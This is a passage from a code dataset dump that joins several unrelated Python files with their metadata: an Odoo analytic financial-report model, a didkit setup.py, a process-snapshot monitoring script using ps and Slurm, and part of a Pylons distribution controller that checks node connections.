values\r\n final_result = []\r\n for item in result:\r\n if len(item) > 1 and '-' in item:\r\n final_result.append('-')\r\n final_result.append(item[1:])\r\n else:\r\n final_result.append(item)\r\n return final_result\r\n\r\n def _expand_formulas(self, formulas):\r\n result = self._process_formulas()\r\n while (1):\r\n verify_list = []\r\n new_result = []\r\n for item in result:\r\n if len(item) > 1 and '.' in item:\r\n data = item.split('.')\r\n report_line_id = self.search([('code', '=', data[0])], limit=1)\r\n if not report_line_id.domain:\r\n data = report_line_id._process_formulas()\r\n if any(operator in result for operator in ['+','-','*','/']) and any(operator in data for operator in ['+','-','*','/']):\r\n new_data_list = ['(']\r\n for item2 in data:\r\n new_data_list.append(item2)\r\n new_data_list.append(')')\r\n new_result.extend(new_data_list)\r\n else:\r\n new_result.extend(data)\r\n verify_list.append(False)\r\n else:\r\n new_result.append(item)\r\n verify_list.append(True)\r\n else:\r\n new_result.append(item)\r\n verify_list.append(True)\r\n operator = item\r\n result = new_result\r\n if all(verify_list):\r\n break\r\n return result\r\n\r\n def _eval_formula(self, financial_report, debit_credit, context, currency_table, linesDict):\r\n if context.analytic_level_id:\r\n analytic_account_ids = self.env['account.analytic.account'].search([('level_id','=',context.analytic_level_id.id)]).ids\r\n analytic_amount_dict = dict([(id, 0.00) for id in analytic_account_ids])\r\n analytic_final_dict = dict([(id, '') for id in analytic_account_ids])\r\n if self.domain:\r\n field_data = self.formulas.split(';')\r\n field_data = field_data[0].split('=')\r\n field_data = field_data[1].split('.')\r\n # field_data_sign = field_data[0].replace('sum', '')\r\n field_data_sign = ''\r\n\r\n domain = ast.literal_eval(self.domain)\r\n domain.extend([('date','>=',self.env.context.get('date_from')),('date','<=',self.env.context.get('date_to'))])\r\n line_ids = self.env['account.move.line'].search(domain)\r\n for line in line_ids:\r\n if line.analytic_account_id.id in analytic_amount_dict:\r\n analytic_amount_dict.update({line.analytic_account_id.id: analytic_amount_dict.get(line.analytic_account_id.id) + line.read([field_data[1]])[0].get(field_data[1])})\r\n # Updating main dict\r\n for id in analytic_final_dict:\r\n analytic_final_dict.update({id: field_data_sign + str(analytic_amount_dict.get(id))})\r\n elif self.formulas:\r\n result = self._expand_formulas(self.formulas)\r\n for item in result:\r\n if len(item) > 1:\r\n if type(item) == tuple:\r\n analytic_amount_dict2 = dict([(id, 0.00) for id in analytic_account_ids])\r\n analytic_final_dict2 = dict([(id, '') for id in analytic_account_ids])\r\n for item2 in item:\r\n if len(item2) > 1 and '.' in item2:\r\n data = item2.split('.')\r\n report_line_id = self.search([('code', '=', data[0])], limit=1)\r\n field_data = report_line_id.formulas.split(';')\r\n field_data = field_data[0].split('=')\r\n field_data = field_data[1].split('.')\r\n # field_data_sign = field_data[0].replace('sum', '')\r\n field_data_sign = ''\r\n\r\n domain = ast.literal_eval(report_line_id.domain)\r\n domain.extend([('date', '>=', self.env.context.get('date_from')),('date', '<=', self.env.context.get('date_to'))])\r\n line_ids = self.env['account.move.line'].search(domain)\r\n for line in line_ids:\r\n if line.analytic_account_id.id in analytic_amount_dict2:\r\n analytic_amount_dict2.update({line.analytic_account_id.id: analytic_amount_dict2.get(line.analytic_account_id.id) + line.read([field_data[1]])[0].get(field_data[1])})\r\n for id in analytic_amount_dict2:\r\n analytic_final_dict2.update({id: analytic_final_dict2.get(id) + field_data_sign + str(analytic_amount_dict2.get(id))})\r\n elif len(item2) > 1 and item2 == 'NDays':\r\n d1 = datetime.strptime(self.env.context['date_from'], \"%Y-%m-%d\")\r\n d2 = datetime.strptime(self.env.context['date_to'], \"%Y-%m-%d\")\r\n days = (d2 - d1).days\r\n for id in analytic_final_dict2:\r\n analytic_final_dict2.update({id: str(analytic_final_dict2.get(id)) + str(days)})\r\n else:\r\n for id in analytic_final_dict2:\r\n analytic_final_dict2.update({id: str(analytic_final_dict2.get(id)) + item2})\r\n # Updating main dict\r\n for id in analytic_final_dict2:\r\n analytic_final_dict.update({id: analytic_final_dict.get(id) + '(' + analytic_final_dict2.get(id) + ')'})\r\n elif len(item) > 1 and item == 'NDays':\r\n # Updating main dict\r\n d1 = datetime.strptime(self.env.context['date_from'], \"%Y-%m-%d\")\r\n d2 = datetime.strptime(self.env.context['date_to'], \"%Y-%m-%d\")\r\n days = (d2 - d1).days\r\n for id in analytic_final_dict:\r\n analytic_final_dict.update({id: analytic_final_dict.get(id) + str(days)})\r\n else:\r\n data = item.split('.')\r\n report_line_id = self.search([('code', '=', data[0])], limit=1)\r\n field_data = report_line_id.formulas.split(';')\r\n field_data = field_data[0].split('=')\r\n field_data = field_data[1].split('.')\r\n # field_data_sign = field_data[0].replace('sum', '')\r\n field_data_sign = ''\r\n\r\n domain = ast.literal_eval(report_line_id.domain)\r\n domain.extend([('date', '>=', self.env.context.get('date_from')), ('date', '<=', self.env.context.get('date_to'))])\r\n line_ids = self.env['account.move.line'].search(domain)\r\n for line in line_ids:\r\n if line.analytic_account_id.id in analytic_amount_dict:\r\n analytic_amount_dict.update({line.analytic_account_id.id: analytic_amount_dict.get(line.analytic_account_id.id) + line.read([field_data[1]])[0].get(field_data[1])})\r\n # Updating main dict\r\n for id in analytic_amount_dict:\r\n analytic_final_dict.update({id: analytic_final_dict.get(id) + field_data_sign + str(analytic_amount_dict.get(id))})\r\n\r\n elif len(item) > 1 and item == 'NDays':\r\n # Updating main dict\r\n d1 = datetime.strptime(self.env.context['date_from'], \"%Y-%m-%d\")\r\n d2 = datetime.strptime(self.env.context['date_to'], \"%Y-%m-%d\")\r\n days = (d2 - d1).days\r\n for id in analytic_final_dict:\r\n analytic_final_dict.update({id: analytic_final_dict.get(id) + str(days)})\r\n else:\r\n # Updating main dict\r\n for id in analytic_final_dict:\r\n analytic_final_dict.update({id: analytic_final_dict.get(id) + item})\r\n\r\n debit_credit = debit_credit and financial_report.debit_credit\r\n formulas = self._split_formulas()\r\n if self.code and self.code in linesDict:\r\n res = linesDict[self.code]\r\n else:\r\n res = FormulaLine(self, currency_table, financial_report, linesDict=linesDict)\r\n vals = {}\r\n vals['balance'] = res.balance\r\n if context.analytic_level_id:\r\n vals['analytic_final_dict'] = analytic_final_dict\r\n if debit_credit:\r\n vals['credit'] = res.credit\r\n vals['debit'] = res.debit\r\n\r\n results = {}\r\n if self.domain and self.groupby and self.show_domain != 'never':\r\n aml_obj = self.env['account.move.line']\r\n tables, where_clause, where_params = aml_obj._query_get(domain=self.domain)\r\n sql, params = self._get_with_statement(financial_report)\r\n if financial_report.tax_report:\r\n where_clause += ''' AND \"account_move_line\".tax_exigible = 't' '''\r\n\r\n groupby = self.groupby or 'id'\r\n if groupby not in self.env['account.move.line']:\r\n raise ValueError('Groupby should be a field from account.move.line')\r\n select, select_params = self._query_get_select_sum(currency_table)\r\n params += select_params\r\n sql = sql + \"SELECT \\\"account_move_line\\\".\" + groupby + \", \" + select + \" FROM \" + tables + \" WHERE \" + where_clause + \" GROUP BY \\\"account_move_line\\\".\" + groupby\r\n\r\n params += where_params\r\n self.env.cr.execute(sql, params)\r\n results = self.env.cr.fetchall()\r\n results = dict([(k[0], {'balance': k[1], 'amount_residual': k[2], 'debit': k[3], 'credit': k[4]}) for k in results])\r\n c = FormulaContext(self.env['account.financial.html.report.line'], linesDict, currency_table, financial_report, only_sum=True)\r\n if formulas:\r\n for key in results:\r\n c['sum'] = FormulaLine(results[key], currency_table, financial_report, type='not_computed')\r\n c['sum_if_pos'] = FormulaLine(results[key]['balance'] >= 0.0 and results[key] or {'balance': 0.0}, currency_table, financial_report, type='not_computed')\r\n c['sum_if_neg'] = FormulaLine(results[key]['balance'] <= 0.0 and results[key] or {'balance': 0.0}, currency_table, financial_report, type='not_computed')\r\n for col, formula in formulas.items():\r\n if col in results[key]:\r\n results[key][col] = safe_eval(formula, c, nocopy=True)\r\n to_del = []\r\n for key in results:\r\n if self.env.user.company_id.currency_id.is_zero(results[key]['balance']):\r\n to_del.append(key)\r\n for key in to_del:\r\n del results[key]\r\n\r\n results.update({'line': vals})\r\n return results\r\n\r\n @api.multi\r\n def get_lines(self, financial_report, context, currency_table, linesDicts):\r\n final_result_table = []\r\n comparison_table = context.get_periods()\r\n currency_precision = self.env.user.company_id.currency_id.rounding\r\n # build comparison table\r\n\r\n for line in self:\r\n res = []\r\n debit_credit = len(comparison_table) == 1\r\n domain_ids = {'line'}\r\n k = 0\r\n for period in comparison_table:\r\n period_from = period[0]\r\n period_to = period[1]\r\n strict_range = False\r\n if line.special_date_changer == 'from_beginning':\r\n period_from = False\r\n if line.special_date_changer == 'to_beginning_of_period':\r\n date_tmp = datetime.strptime(period[0], \"%Y-%m-%d\") - relativedelta(days=1)\r\n period_to = date_tmp.strftime('%Y-%m-%d')\r\n period_from = False\r\n if line.special_date_changer == 'strict_range':\r\n strict_range = True\r\n r = line.with_context(date_from=period_from, date_to=period_to, strict_range=strict_range)._eval_formula(financial_report, debit_credit, context, currency_table, linesDicts[k])\r\n debit_credit = False\r\n res.append(r)\r\n domain_ids.update(set(r.keys()))\r\n k += 1\r\n res = self._put_columns_together(res, domain_ids)\r\n if r['line'].get('analytic_final_dict'):\r\n res.update({'analytic_final_dict': r['line'].get('analytic_final_dict')})\r\n\r\n if line.hide_if_zero and all([float_is_zero(k, precision_rounding=currency_precision) for k in res['line']]):\r\n continue\r\n\r\n # Analytic level based amount\r\n columns = []\r\n if context.analytic_level_id and res.get('analytic_final_dict'):\r\n analytic_account_ids = self.env['account.analytic.account'].search([('level_id', '=', context.analytic_level_id.id)]).ids\r\n for aa_id in analytic_account_ids:\r\n amount_string = res.get('analytic_final_dict').get(aa_id)\r\n try:\r\n amount = amount_string and eval(amount_string) or 0.0\r\n except:\r\n amount = 0.0\r\n columns.append(amount)\r\n if not columns:\r\n columns = res['line']\r\n\r\n # Post-processing ; creating line dictionnary, building comparison, computing total for extended, formatting\r\n vals = {\r\n 'id': line.id,\r\n 'name': line.name,\r\n 'type': 'line',\r\n 'level': line.level,\r\n 'footnotes': context._get_footnotes('line', line.id),\r\n 'columns': columns,\r\n 'unfoldable': len(domain_ids) > 1 and line.show_domain != 'always',\r\n 'unfolded': line in context.unfolded_lines or line.show_domain == 'always',\r\n }\r\n if line.action_id:\r\n vals['action_id'] = line.action_id.id\r\n domain_ids.remove('line')\r\n lines = [vals]\r\n groupby = line.groupby or 'aml'\r\n if line in context.unfolded_lines or line.show_domain == 'always':\r\n if line.groupby:\r\n domain_ids = sorted(list(domain_ids), key=lambda k: line._get_gb_name(k))\r\n for domain_id in domain_ids:\r\n name = line._get_gb_name(domain_id)\r\n vals = {\r\n 'id': domain_id,\r\n 'name': name and len(name) >= 45 and name[0:40] + '...' or name,\r\n 'level': 1,\r\n 'type': groupby,\r\n 'footnotes': context._get_footnotes(groupby, domain_id),\r\n 'columns': res[domain_id],\r\n }\r\n if line.financial_report_id.name == 'Aged Receivable':\r\n vals['trust'] = self.env['res.partner'].browse([domain_id]).trust\r\n lines.append(vals)\r\n if domain_ids:\r\n lines.append({\r\n 'id': line.id,\r\n 'name': _('Total') + ' ' + line.name,\r\n 'type': 'o_account_reports_domain_total',\r\n 'level': 1,\r\n 'footnotes': context._get_footnotes('o_account_reports_domain_total', line.id),\r\n 'columns': list(lines[0]['columns']),\r\n })\r\n\r\n # Analytic level based amount\r\n # columns = []\r\n # if context.analytic_level_id:\r\n # analytic_account_ids = self.env['account.analytic.account'].search([('level_id','=',context.analytic_level_id.id)])\r\n # for record in analytic_account_ids:\r\n # amount = ( record.ratio / 100.00) * float(lines[0].get('columns')[0])\r\n # columns.append(line._format(amount))\r\n\r\n for vals in lines:\r\n if len(comparison_table) == 2:\r\n vals['columns'].append(line._build_cmp(vals['columns'][0], vals['columns'][1]))\r\n for i in [0, 1]:\r\n vals['columns'][i] = line._format(vals['columns'][i])\r\n else:\r\n vals['columns'] = map(line._format, vals['columns'])\r\n if columns:\r\n vals['columns'] = map(line._format, columns)\r\n if not line.formulas:\r\n vals['columns'] = ['' for k in vals['columns']]\r\n\r\n if len(lines) == 1:\r\n new_lines = line.children_ids.get_lines(financial_report, context, currency_table, linesDicts)\r\n if new_lines and line.level > 0 and line.formulas:\r\n divided_lines = self._divide_line(lines[0])\r\n result = [divided_lines[0]] + new_lines + [divided_lines[1]]\r\n else:\r\n result = []\r\n if line.level > 0:\r\n result += lines\r\n result += new_lines\r\n if line.level <= 0:\r\n result += lines\r\n else:\r\n result = lines\r\n final_result_table += result\r\n\r\n return final_result_table\r\n\r\nAccountFinancialReportLine()\r\n\r\nclass FormulaLine(object):\r\n def __init__(self, obj, currency_table, financial_report, type='balance', linesDict=None):\r\n if linesDict is None:\r\n linesDict = {}\r\n fields = dict((fn, 0.0) for fn in ['debit', 'credit', 'balance'])\r\n if type == 'balance':\r\n fields = obj.get_balance(linesDict, currency_table, financial_report)[0]\r\n linesDict[obj.code] = self\r\n elif type in ['sum', 'sum_if_pos', 'sum_if_neg']:\r\n if type == 'sum_if_neg':\r\n obj = obj.with_context(sum_if_neg=True)\r\n if type == 'sum_if_pos':\r\n obj = obj.with_context(sum_if_pos=True)\r\n if obj._name == 'account.financial.html.report.line':\r\n fields = obj._get_sum(currency_table, financial_report)\r\n self.amount_residual = fields['amount_residual']\r\n elif obj._name == 'account.move.line':\r\n self.amount_residual = 0.0\r\n field_names = ['debit', 'credit', 'balance', 'amount_residual']\r\n res = obj.env['account.financial.html.report.line']._compute_line(currency_table, financial_report)\r\n for field in field_names:\r\n fields[field] = res[field]\r\n self.amount_residual = fields['amount_residual']\r\n elif type == 'not_computed':\r\n for field in fields:\r\n fields[field] = obj.get(field, 0)\r\n self.amount_residual = obj.get('amount_residual', 0)\r\n elif type == 'null':\r\n self.amount_residual = 0.0\r\n self.balance = fields['balance']\r\n self.credit = fields['credit']\r\n self.debit = fields['debit']\r\n\r\nclass FormulaContext(dict):\r\n def __init__(self, reportLineObj, linesDict, currency_table, financial_report, curObj=None, only_sum=False, *data):\r\n self.reportLineObj = reportLineObj\r\n self.curObj = curObj\r\n self.linesDict = linesDict\r\n self.currency_table = currency_table\r\n self.only_sum = only_sum\r\n self.financial_report = financial_report\r\n return super(FormulaContext, self).__init__(data)\r\n\r\n def __getitem__(self, item):\r\n formula_items = ['sum', 'sum_if_pos', 'sum_if_neg']\r\n if item in set(__builtins__.keys()) - set(formula_items):\r\n return super(FormulaContext, self).__getitem__(item)\r\n\r\n if self.only_sum and item not in formula_items:\r\n return FormulaLine(self.curObj, self.currency_table, self.financial_report, type='null')\r\n if self.get(item):\r\n return super(FormulaContext, self).__getitem__(item)\r\n if self.linesDict.get(item):\r\n return self.linesDict[item]\r\n if item == 'sum':\r\n res = FormulaLine(self.curObj, self.currency_table, self.financial_report, type='sum')\r\n self['sum'] = res\r\n return res\r\n if item == 'sum_if_pos':\r\n res = FormulaLine(self.curObj, self.currency_table, self.financial_report, type='sum_if_pos')\r\n self['sum_if_pos'] = res\r\n return res\r\n if item == 'sum_if_neg':\r\n res = FormulaLine(self.curObj, self.currency_table, self.financial_report, type='sum_if_neg')\r\n self['sum_if_neg'] = res\r\n return res\r\n if item == 'NDays':\r\n d1 = datetime.strptime(self.curObj.env.context['date_from'], \"%Y-%m-%d\")\r\n d2 = datetime.strptime(self.curObj.env.context['date_to'], \"%Y-%m-%d\")\r\n res = (d2 - d1).days\r\n self['NDays'] = res\r\n return res\r\n line_id = self.reportLineObj.search([('code', '=', item)], limit=1)\r\n if line_id:\r\n strict_range = line_id.special_date_changer == 'strict_range'\r\n period_from = line_id._context['date_from']\r\n period_to = line_id._context['date_to']\r\n if line_id.special_date_changer == 'from_beginning':\r\n period_from = False\r\n if line_id.special_date_changer == 'to_beginning_of_period' and line_id._context.get('date_from'):\r\n date_tmp = datetime.strptime(line_id._context['date_from'], \"%Y-%m-%d\") - relativedelta(days=1)\r\n period_to = date_tmp.strftime('%Y-%m-%d')\r\n period_from = False\r\n res = FormulaLine(line_id.with_context(strict_range=strict_range, date_from=period_from, date_to=period_to), self.currency_table, self.financial_report, linesDict=self.linesDict)\r\n self.linesDict[item] = res\r\n return res\r\n return super(FormulaContext, self).__getitem__(item)\r\n","sub_path":"beta-dev1/opt/odoo/odoo/addons/core/multi_level_analytical/models/account_financial_report.py","file_name":"account_financial_report.py","file_ext":"py","file_size_in_byte":24936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"621672920","text":"#! /usr/bin/env python3\nimport os\nimport platform\nfrom setuptools import setup, Extension\n\n##Determine what system we are building on to determine what type of shared object has been built and needs copyingthis differs between OS's (e.g. libdidkit.so vs libdidkit.dylib vs libdidkit.dll)\ndidpath = \"didkit\"\nhost_os = platform.system()\n\nif host_os == \"Linux\":\n LIBDIDKIT_SHARE_OBJ = os.path.join(didpath, 'libdidkit.so')\nelif host_os == \"Darwin\":\n LIBDIDKIT_SHARE_OBJ = os.path.join(didpath, 'libdidkit.dylib')\nelif host_os == \"Windows\":\n LIBDIDKIT_SHARE_OBJ = os.path.join(didpath, 'didkit.dll')\nelse:\n raise RuntimeError(\"System type %s unsupported. Exiting setup.\"%(host_os))\n\n## All other static build variables comes from setup.cfg\nsetup_args = dict(\n data_files = [ (\"\" , [LIBDIDKIT_SHARE_OBJ] ) ]\n)\n\nsetup(**setup_args)","sub_path":"lib/python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"15878621","text":"import sys\nimport os\nimport datetime\nimport time\nimport csv\nimport socket\nimport multiprocessing\n\nfrom contextlib import contextmanager\nfrom subprocess import check_output, SubprocessError, TimeoutExpired, DEVNULL\nfrom collections import defaultdict, namedtuple\nfrom configparser import ConfigParser\n\n\ndef get_timestamp():\n \"\"\"\n Returns time stamp as string in ISO 8601 with time zone information.\n \"\"\"\n\n # https://stackoverflow.com/a/28147286\n utc_offset_sec = time.altzone if time.localtime().tm_isdst else time.timezone\n utc_offset = datetime.timedelta(seconds=-utc_offset_sec)\n\n return (\n datetime.datetime.now()\n .replace(tzinfo=datetime.timezone(offset=utc_offset))\n .strftime(\"%Y-%m-%dT%H:%M:%S.%f%z\")\n )\n\n\ndef get_slurm_info(hostname):\n \"\"\"\n Try to get the users, jobids, and projects from the current `hostname`.\n If a user should run two jobs with two different projects or jobids, only the last discovered values will be assumed for the user.\n\n :returns: A defaultdict with the mapping from user to project. Project is '-' if the user is not found or slurm is not available.\n \"\"\"\n\n user_to_slurminfo = defaultdict(\n lambda: {\"jobid\": \"-\", \"project\": \"-\", \"num_cores\": \"-\", \"min_mem\": \"-\"}\n )\n\n # %i Job ID (or _ for job arrays)\n # %a Account (project)\n # %u User\n try:\n command = f\"squeue --noheader --nodelist={hostname} --format=%i,%a,%u,%m,%C\"\n output = check_output(command, shell=True, stderr=DEVNULL, timeout=3).decode(\n \"utf8\"\n )\n except TimeoutExpired:\n # Slurm took too more than 3 seconds to respond, perhaps the node is ill\n # we had a case where this lead to Sonar jobs piling up since they were waiting for\n # a stuck Slurm\n return user_to_slurminfo\n except SubprocessError:\n # if Slurm is not available, return the empty defaultdict that will return '-' for any key call.\n return user_to_slurminfo\n\n for line in output.split(\"\\n\"):\n line = line.strip()\n if not line:\n continue\n jobid, project, user, min_mem, num_cores = line.split(\",\")\n user_to_slurminfo[user] = {\n \"jobid\": jobid,\n \"project\": project,\n \"num_cores\": num_cores,\n \"min_mem\": min_mem,\n }\n\n return user_to_slurminfo\n\n\ndef get_available_memory():\n \"\"\"\n Tries to return the memory available on the current node in bytes. Returns a negative number if the value cannot be determined.\n This is Unix-specific.\n \"\"\"\n\n # Another possibility would be to read /proc/meminfo\n return os.sysconf(\"SC_PAGE_SIZE\") * os.sysconf(\"SC_PHYS_PAGES\")\n\n\ndef extract_processes(raw_text, ignored_users):\n \"\"\"\n Extract user, cpu, memory, and command from `raw_text` that should be the (special) output of a `ps` command.\n `ignored_users` should be a list with users that shall be ignored.\n \"\"\"\n\n cpu_percentages = defaultdict(float)\n mem_percentages = defaultdict(float)\n for line in raw_text.split(\"\\n\"):\n # Using maxsplit to prevent commands to be split. This is unstable if the `ps` call is altered!\n words = line.split(maxsplit=4)\n if len(words) == 5:\n pid, user, cpu_percentage, mem_percentage, command = words\n if user not in ignored_users:\n cpu_percentages[(user, command)] += float(cpu_percentage)\n mem_percentages[(user, command)] += float(mem_percentage)\n\n return cpu_percentages, mem_percentages\n\n\ndef test_extract_processes():\n text = \"\"\"\n 2011 bob 10.0 20.0 slack\n 2022 bob 10.0 15.0 chromium\n 12057 bob 10.0 15.0 chromium\n 2084 alice 10.0 5.0 slack\n 2087 bob 10.0 5.0 someapp\n 2090 alice 10.0 5.0 someapp\n 2093 alice 10.0 5.0 someapp\n \"\"\"\n\n cpu_percentages, mem_percentages = extract_processes(\n raw_text=text, ignored_users=[]\n )\n\n assert cpu_percentages == {\n (\"bob\", \"slack\"): 10.0,\n (\"bob\", \"chromium\"): 20.0,\n (\"alice\", \"slack\"): 10.0,\n (\"bob\", \"someapp\"): 10.0,\n (\"alice\", \"someapp\"): 20.0,\n }\n assert mem_percentages == {\n (\"bob\", \"slack\"): 20.0,\n (\"bob\", \"chromium\"): 30.0,\n (\"alice\", \"slack\"): 5.0,\n (\"bob\", \"someapp\"): 5.0,\n (\"alice\", \"someapp\"): 10.0,\n }\n\n cpu_percentages, mem_percentages = extract_processes(\n raw_text=text, ignored_users=[\"bob\"]\n )\n\n assert cpu_percentages == {(\"alice\", \"slack\"): 10.0, (\"alice\", \"someapp\"): 20.0}\n assert mem_percentages == {(\"alice\", \"slack\"): 5.0, (\"alice\", \"someapp\"): 10.0}\n\n\ndef get_hostname():\n # we first try to get the hostname alias\n # we do this because at least on our cluster slurm uses\n # the alias (\"c61-8\") instead of the full hostname (e.g. \"c61-8.local\")\n hostname = check_output([\"hostname\", \"-a\"]).rstrip().decode(\"utf-8\")\n if hostname == \"\":\n # if alias is empty, we try hostname\n hostname = socket.gethostname()\n # workaround: on one machine hostname -a yields a long (full?) hostname which\n # confused Slurm\n # here we assume that Slurm hosts never contain \".\"\n # and cut away the part after the dot\n # this might be wrong\n return hostname.split(\".\")[0]\n\n\ndef create_snapshot(cpu_cutoff, mem_cutoff, ignored_users):\n \"\"\"\n Take a snapshot of the currently running processes that use more than `cpu_cutoff` cpu and `mem_cutoff` memory, ignoring the set or list `ignored_users`. Return a list of lists being lines of columns.\n \"\"\"\n\n # -e show all processes\n # -o output formatting. user:30 is a hack to prevent cut-off user names\n output = check_output(\n \"ps -e --no-header -o pid,user:30,pcpu,pmem,comm\", shell=True\n ).decode(\"utf-8\")\n timestamp = get_timestamp()\n hostname = get_hostname()\n num_cores = multiprocessing.cpu_count()\n slurm_info = get_slurm_info(hostname)\n total_memory = get_available_memory()\n if total_memory < 0:\n total_memory = 1\n\n cpu_percentages, mem_percentages = extract_processes(\n raw_text=output, ignored_users=ignored_users\n )\n\n snapshot = []\n\n for user, command in cpu_percentages:\n cpu_percentage = cpu_percentages[(user, command)]\n if cpu_percentage >= cpu_cutoff:\n mem_percentage = mem_percentages[(user, command)]\n if mem_percentage >= mem_cutoff:\n # Weird number is 1024*1024*100 to get MiB and %\n mem_absolute = int(total_memory * mem_percentage / 104857600)\n snapshot.append(\n [\n timestamp,\n hostname,\n num_cores,\n user,\n command,\n \"{:.1f}\".format(cpu_percentage),\n mem_absolute,\n slurm_info[user][\"project\"],\n slurm_info[user][\"jobid\"],\n slurm_info[user][\"num_cores\"],\n slurm_info[user][\"min_mem\"],\n ]\n )\n\n return snapshot\n\n\ndef main(config):\n \"\"\"\n Take a snapshot of the currently running processes that use more than `cpu_cutoff` cpu and `mem_cutoff` memory and print it to stdout.\n \"\"\"\n\n snapshot = create_snapshot(\n config[\"cpu_cutoff\"], config[\"mem_cutoff\"], config[\"ignored_users\"]\n )\n\n f_writer = csv.writer(\n sys.stdout,\n delimiter=config[\"output_delimiter\"],\n quotechar='\"',\n quoting=csv.QUOTE_MINIMAL,\n )\n f_writer.writerows(snapshot)\n","sub_path":"venv/Lib/site-packages/sonar/snap.py","file_name":"snap.py","file_ext":"py","file_size_in_byte":7848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17539188","text":"# Copyright 2011 Department of Defence\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport logging\nimport couchdb\nimport urlparse\nimport json\nimport urllib2\nimport threading\nimport re\nfrom pylons import request, response, session, tmpl_context as c, url\nfrom pylons.controllers.util import abort, redirect\nfrom lr.model import LRNode as sourceLRNode, \\\n NodeServiceModel, ResourceDataModel, LRNodeModel, defaultCouchServer, appConfig\nfrom lr.lib.base import BaseController, render\nfrom lr.lib import helpers as h\nimport base64\nimport pprint\n\nlog = logging.getLogger(__name__)\n\nclass DistributeController(BaseController):\n def __before__(self):\n self.resource_data = appConfig['couchdb.db.resourcedata']\n \"\"\"REST Controller styled on the Atom Publishing Protocol\"\"\"\n # To properly map this controller, ensure your config/routing.py\n # file has a resource setup:\n # map.resource('distribute', 'distribute')\n def index(self, format='html'):\n \"\"\"GET /distribute: All items in the collection\"\"\"\n # url('distribute')\n distributeInfo = {'OK': True}\n \n #if sourceLRNode.isServiceAvailable(NodeServiceModel.DISTRIBUTE) == False:\n #distributeInfo['OK'] = False\n #else:\n distributeInfo['node_config'] = sourceLRNode.config\n distributeInfo['distribute_sink_url'] = urlparse.urljoin(request.url,self.resource_data)\n # Check to see if the couch resource_data is defined in the config if so use it.\n if appConfig.has_key(\"distribute_sink_url\"):\n distributeInfo['distribute_sink_url'] = appConfig[\"distribute_sink_url\"]\n\n log.info(\"received distribute request...returning: \\n\"+json.dumps(distributeInfo))\n return json.dumps(distributeInfo)\n \n def _getDistributeDestinations(self):\n \"\"\"\"Method to test the connections and returns a list of destionation node\n if the connections are valid\"\"\"\n nodeDestinationList =[]\n gatewayConnectionList = []\n for connection in sourceLRNode.connections:\n # Make sure that the connection is active \n if connection.active == False:\n continue\n destinationLRNode = None\n \n if connection.gateway_connection == True:\n gatewayConnectionList.append(connection)\n try:\n # Make sure we only have one slash in the url path. More than one \n #confuses pylons routing libary.\n destinationURL = urlparse.urljoin(connection.destination_node_url.strip(),\n \"distribute\")\n \n request = urllib2.Request(destinationURL)\n credential = sourceLRNode.getDistributeCredentialFor(destinationURL)\n \n if credential is not None:\n base64string = base64.encodestring('%s:%s' % (credential['username'],credential['password'])).replace(\"\\n\", \"\")\n request.add_header(\"Authorization\", \"Basic %s\" % base64string)\n \n log.info(\"\\n\\nAccess destination node at: \"+pprint.pformat(request.__dict__))\n distributeInfo = json.load(urllib2.urlopen(request))\n destinationLRNode = LRNodeModel(distributeInfo['node_config'])\n except Exception as ex:\n log.exception(ex)\n continue\n # Use of local variable to store if the connection is gateway connection. It is\n # done this way to deal with mismatch between node de and connection\n # description.\n isGatewayConnection = (\n (sourceLRNode.nodeDescription.gateway_node == True) and\n (destinationLRNode.nodeDescription.gateway_node ==True))\n # Skip the connection if there is any mismatch between the connection and\n # the node data.\n if isGatewayConnection != connection.gateway_connection:\n log.info(\"Skip connection. 'gateway_connection' mismatch between node and connection data\")\n continue\n \n # Only one gateway connection is allowed, faulty network description\n if len(gatewayConnectionList) > 1:\n log.info(\"***Abort distribution. More than one gateway node connection\")\n #Clear the node destination list no distribution is network description \n # is faulty\n nodeDestinationList = []\n break\n #Calcuate if the connection is gateway one, if so \n #cannot distribute across non social communities\n if ((sourceLRNode.communityDescription.community_id != \n destinationLRNode.communityDescription.community_id) and\n ((sourceLRNode.communityDescription.social_community == False) or\n (destinationLRNode.communityDescription.social_community == False))):\n log.info(\"Cannot distribute across non social communities\")\n continue\n # Cannot distribute across networks (or communities) unless gateway\n if((isGatewayConnection == False) and\n ((sourceLRNode.communityDescription.community_id != \n destinationLRNode.communityDescription.community_id) or\n (sourceLRNode.networkDescription.network_id != \n destinationLRNode.networkDescription.network_id))):\n log.info(\"Different Network. Cannot distribute across networks (or communities) unless gateway\")\n continue\n # Gateway must only distribute across different networks.\n if((isGatewayConnection ==True) and\n (sourceLRNode.networkDescription.network_id == \n destinationLRNode.networkDescription.network_id)):\n log.info(\"Gateway must only distribute across different networks\")\n continue\n # Only gateways can distribute on gateway connection. This is really for \n # catching mismatch in the data where a connection says it is between \n # gateways when the nodes are not both gateways.\n if((connection.gateway_connection == True) and \n ((sourceLRNode.nodeDescription.gateway_node == False) or\n (destinationLRNode.nodeDescription.gateway_node == False))):\n log.info(\"Only gateways can distribute on gateway connection\")\n continue\n nodeInfo = { \"distributeInfo\": distributeInfo,\n \"distribute_sink_url\": distributeInfo[\"distribute_sink_url\"],\n \"destinationNode\":destinationLRNode}\n nodeDestinationList.append(nodeInfo)\n \n return nodeDestinationList\n \n def create(self):\n \"\"\"POST / distribute start distribution\"\"\"\n \n def doDistribution(destinationNode, server, sourceUrl, destinationUrl, lock):\n # We want to always use the replication filter function to replicate\n # only distributable doc and filter out any other type of documents.\n # However we don't have any query arguments until we test if there is any filter.\n replicationOptions={'filter':ResourceDataModel.REPLICATION_FILTER, \n 'query_params': None}\n # If the destination node is using an filter and is not custom use it\n # as the query params for the filter function\n if ((destinationNode.filterDescription is not None) and \n (destinationNode.filterDescription.custom_filter == False)):\n replicationOptions['query_params'] = destinationNode.filterDescription.specData\n \n #if distinationNode['distribute service'] .service_auth[\"service_authz\"] is not None:\n 